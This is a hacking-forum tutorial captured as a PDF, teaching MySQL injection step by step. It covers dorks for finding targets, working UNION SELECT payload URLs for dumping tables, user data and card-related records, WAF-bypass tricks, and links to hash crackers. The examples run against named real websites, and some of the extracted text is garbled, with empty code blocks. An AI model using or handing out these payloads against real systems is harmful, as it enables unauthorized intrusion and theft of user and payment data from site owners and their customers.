TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1.pdf

10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

http://www.hackforums.net/showthread.php?tid=1814660 1/12

Thread Options

10-13-2011, 12:41 AM (This post was last modified: 12-16-2012 12:04 AM by bckslsh..) Post: #1

TUTORIAL - Basic MySQL injection [UPDATED

with BLIND SQLi]

bckslsh. Closed Account

Prestige: 71Posts: 2,780Joined: May 2011 Reputation: 134

Before you say there are already enough tutorials on here, I know. But I plan onmaking this one of the best on hackforums.

If you're looking for string injections, or WAF bypassing please look at the bottomof this thread. :)

Contents - Control + F the code (S0.x)

S0.1 - Full tutorial.S0.2 - String injection. Do you not get an error even after order by 1000?S0.3 - WAF bypassing. Do you get 403'd when trying to use commands?

S0.4 - Do you get "Illegal mix of collations for operation 'UNION'" when trying toinject?

S0.5 - Getting data from other databases.S0.6 - Blind SQL Injection

S0.1 - The tutorial

First of all we wil want to either find vulnerabilities on a site, or find one via dorks.

To find vulnerabilities on a site, we can use google. Type into google,

Code:

site:site.com inurl:.php?id=

If you get no results, you can try

Code:

site:site.com inurl:.php?

To find sites via dorks, it is very simple. Just type into google -

inurl:dork



For example

Code:

inurl:article.php?id=

Here is a list of dorks you could use.http://pastebin.com/k2FFy1YH

And of course, you could come up with your own.

After we have found a vulnerable site, we will test to see if it is vunerable to SQLinjection. Simply add an ' at the end of the parameter, example -

Code:

.php?id=1'

And if we get any sort of error, it MAY be vulnerable. You can check by using theorder by technique.

Add order by 1-- onto the end of your URL, and if displays normally then we canmove on. Else if you still get an error, chances are it is not vulnerable.

Now that we know the site is vulnerable, we will continue injecting. I have found asite for the purpose of this tutorial.

Code:

http://www.iblist.com/book.php?id=235

We add ' onto the end of the url.

Code:

http://www.iblist.com/book.php?id=235'

And we get an error. Now add

Code:

order by 1--

so

Code:

http://www.iblist.com/book.php?id=235 order by 1--



and we get no error. It's vulnerable.

Now we want to find out the number of columns. To do this there are multipleways, but the most common are ORDER BY, and GROUP BY. They can be used in

the same way.

We will add order by 1, and keep increasing the integer untill we get an error. Saywe go up by one at a time, and we get an error when we hit 5. This means the site

would have 4 columns.

Code:


No

Code:


Code:




or

Code:

@@version

Code:

http://www.iblist.com/book.php?id=null UNION SELECT1,version(),3,4,5,6,7,8,9,10,11,12,13,14--

Ahh, it's running version 5. That's good. If it was



After going through, I know there are 56 tables.

Code:

http://www.iblist.com/book.php?id=null UNION SELECT1,concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14 from

information_schema.tables where table_schema=database() LIMIT 56,1--

Because if i try 57,1 i get an error.

Now search through the tables untill you find something intresting, such as "admin"or "users".

Table 56 happens to be users. Note it down, incase you forget. So we will work withthis, if we don't get anything usefull we will try and find another table which may

contain sensitive data.

Now we want to find out the columns within that table. To do this we will raplaceconcat(table_name) with column_name. And replace information_schema.tables

with information_schema.columns, and add the table_name="tablename" instead oftable_schema.

So

Code:

http://www.iblist.com/book.php?id=null UNION SELECT1,concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 frominformation_schema.columns where table_name="users"--

But we get an error. To bypass this we will have to use CHAR(charcode)

So users would be

Code:

CHAR(117, 115, 101, 114, 115)

I'd suggest using HackBar to convert it. It is a nifty little addon for firefox.

But it still displays no data. Maybe the column is empty? To find out use "count"

And derp, it returned 0.. fail on my behalf. I was writing this tutorial in real time.

So we will gather data from another table, just so I can show how you do it.

I found another table, it doesn't contain that much useful data, but for thepurposes of the tutorial I will show you how to extract data from a table :D



The table I found was "puser"

so

Code:

http://www.iblist.com/book.php?id=null UNION SELECT1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 from

information_schema.columns where table_name=CHAR(112, 117, 115, 101,114)--

And we get.

Code:

id,username

To extract this data we will have to do group_concat(columns) from table

So

Code:

http://www.iblist.com/book.php?id=null UNION SELECT1,group_concat(id,username),3,4,5,6,7,8,9,10,11,12,13,14 from puser--

But it looks terribad, not layed out right and hard to tell them apart.

So we will add some hexdecimal values for a line break, and a semi colon.

Code:

http://www.iblist.com/book.php?id=null UNION SELECT1,group_concat(id,0x3a,username,0x0a),3,4,5,6,7,8,9,10,11,12,13,14 from

puser--

0x3a = :0x0a = line break

Easier to tell them apart now :) And again, if you can't see them all you can useconcat and limit.

If you want to find the username for a specific ID, viceversa, you can use

Code:

http://www.iblist.com/book.php?id=null UNION SELECT1,group_concat(id,0x3a,username,0x0a),3,4,5,6,7,8,9,10,11,12,13,14 from

puser where id=1--



Now that you have this data, you can do whatever you want with it. Unfortunatleythis didn't conain any passwords, but now you know hot to extract the column

data if there is a passwords column. If it comes out as a long string of letters, it ismost likely an MD5 hash. To crack it you can either download MDBruter, or any

other MD5 bruteforcer, or see if it has already been cracked by going to

http://hashchecker.de/find.html

S0.2 - String Injection

If you're trying to find out the number of columns for a site, yet when you do orderby 999 you don't get an error, you should try string injection next. To do this

simply add

--++--++--

instead of

--

onto the end of your url, and add an apostrophe " ' " ontot the end of theparameter, so it would look like

Code:

www.site.com/example.php?id=1 order by 999--



This block out nasty SQL commands that could be a potential threat to the site.

If you're injecting, and you run across this, it is very simple to bypass. There are afew methods, examples -

Alternating between Capitalised/Non-Capitalised.

Code:

http://site.com/example.php?id=null UnIOn SelECT 1,2,3,4,5--

Using comment tags

Code:

/*!*/

Code:

http://site.com/example.php?id=null /*!UNION*/ /*!SELECT*/ 1,2,3,4,5--

Some of the more notable commands/phrases it blocks out in a standard injectionare -

Code:

UNIONSELECT

GROUP_CONCATCONCAT

INFORMATION_SCHEMATABLE_SCHEMA

Note, to you can't bypass group_concat, so you have to use /*!Concat*/ to selectone at a time. And at the end of the injection, before the --'s add LIMIT 0,1 and

keep increasing it by 1 to see each value.

S0.4 - Illegal mix of collations for operation 'UNION'

This is a common error that alot of people get. Normally when people are trying touse "group_concat", or "version()" etc. Alot of the time when people get this errorthey think the site isn't injectable, and just give up and go find a new site. Well it'seasy to get past this. All you have to do it unhex a hex'd command. For example



Code:

group_concat(unhex(hex(table_name)))

Example on a site -

Code:

http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT1,2,group_concat(unhex(hex(table_name))) from

/*!information_schema*/.tables where table_schema=database()--

You can also use "convert".

Code:

group_concat(CONVERT(table_name USING latin1))

Code:

http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT1,2,group_concat(CONVERT(table_name USING latin1)) from

/*!information_schema*/.tables where table_schema=database()--

And the following:

uncompress(compress(version()))cast(version() as char)

aes_decrypt(aes_encrypt(version(),1),1)binary(version())

CONVERT(version() USING x)x = charset, for example

asciibinarylatin1utf8

S0.5 - Getting data from other DBs'

Have you ever gone through all the trouble of injecting a site just to find that thereare no user tables? Well chances are there might be, although there might not be.But we will find out how to go by this, by looking in other databases on the site.

First of all we will need to find the current databases. To do this you will use this -

Code:

group_concat(schema_name) from information_schema.schemata



Example on a site -

Code:

http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT1,2,group_concat(CONVERT(schema_name USING latin1)) from

/*!information_schema*/.schemata--

Now that we have the database names, you will have to go through them and findthe one you want. You might not get them all, since group_concat has a 1024

character limit, but you could always use concat and limit, and go through them 1by 1.

For simplicity I will use the first DB in there. "CCS_Shopping_Carts". We will do theusual "group_concat(table_name)". But where we normally put "where

table_schema=database()", we will add the database we want. You will need to hexthe DB, and add "0x" onto the front of it. You can hex it using any string to

hexdecimal converter - http://www.string-functions.com/string-hex.aspx - or usingthe built in one on hackbar.

Example -

Code:

http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT1,2,group_concat(CONVERT(table_name USING latin1)) from

/*!information_schema*/.tables wheretable_schema=0x4343535f53686f7070696e675f4361727473--

Now to get the columns, it's just the same really.

Code:

http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT1,2,group_concat(CONVERT(column_name USING latin1)) from

/*!information_schema*/.columns wheretable_name=0x61636365707465645f6361726473--

And finally to get the data, you want to specify the database name and the tablename like, databasename.table. Note if you're using unhex(hex()) or convert, it

won't work. Just use group_concat, and it will :).

Code:

http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT1,2,group_concat(accepted_cards_id,0x3a,cart_id,0x3a,credit_card_id,0x0a)

from CCS_Shopping_Carts.accepted_cards--

And there we go :).



S0.6 - Blind SQL injection

http://www.hackforums.net/showthread.php?tid=2041266 < tutorial. I reached thecharacter limit on this thread.

Resources.

http://hashchecker.de/find.html - Sends the query to a number of MD5 checkingsites, saves alot of time.

http://timwarriner.com/software/md5brute.html - MD5 Bruteforcer.http://itsecteam.com/en/projects/project1_page2.htm - If you're a skid and can't

be bothered following a simple tutorial, this is for you.http://th3-0utl4ws.com/tools/admin-finder/ - Online admin finder.

http://pastebin.com/wsfBfegb - Admin Finder, scripted in perl. By GlaDiaT0R.Supports PHP/CFM/HTML/ASP

http://www.string-functions.com/string-hex.aspx - String to hexdecimal converter.

Documents

TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1.pdf